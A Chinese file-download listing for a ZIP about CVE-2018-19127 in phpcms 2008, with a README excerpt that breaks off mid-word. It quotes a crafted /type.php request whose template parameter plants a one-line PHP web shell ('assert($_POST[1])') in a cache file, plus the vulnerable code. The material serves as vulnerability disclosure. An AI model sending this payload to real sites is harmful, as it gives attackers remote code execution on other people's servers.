【文件属性】：
文件名称：phpcms-2008-CVE-2018-19127
文件大小：1KB
文件格式：ZIP
更新时间：2021-03-18 23:49:00
phpcms-2008-CVE-2018-19127 最近，我们在phpcms 2008源代码的/type.php中发现了一个漏洞。当攻击者发送诸如“ /type.php?template=tag _（）{}; @ unlink（ FILE ）; assert（$ _ POST [1]）; {//../ rss”之类的精心设计的请求时，恶意内容（在这种情况下“ @unlink（ FILE ）; assert（$ _ POST [1]）;”）将被写入phpcms 2008网站上的缓存文件（在本例中为“ /cache_template/rss.tpl.php”）。 /type.php中有以下代码： if(empty($template)) $template = 'type'; ... include template('phpcms', $template); 使用以下代码在/inclu
【文件预览】：
phpcms-2008-CVE-2018-19127-master
----README.md(2KB)